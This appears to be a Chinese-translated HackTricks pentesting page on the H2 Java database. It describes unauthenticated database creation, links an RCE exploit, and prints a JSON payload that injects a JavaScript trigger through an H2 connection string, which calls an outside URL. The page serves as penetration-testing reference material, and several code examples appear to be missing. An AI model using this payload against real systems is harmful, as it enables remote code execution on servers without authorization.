H2 - Java SQL database

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

支持HackTricks的其他方式:

官方页面:https://www.h2database.com/html/main.html

访问

您可以指定一个不存在的数据库名称以便在没有有效凭据的情况下创建新数据库未经身份验证):

或者,如果您知道例如正在运行的mysql,并且知道该数据库的数据库名称凭据,您可以直接访问它:

来自HTB的Hawk盒子的技巧。

RCE

在与H2数据库通信的权限下,检查此利用以获得RCE:https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed

H2 SQL注入到RCE

这篇文章中,解释了一个有效负载,通过SQL注入滥用H2数据库以获得RCE

[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

其他支持HackTricks的方式:

最后更新于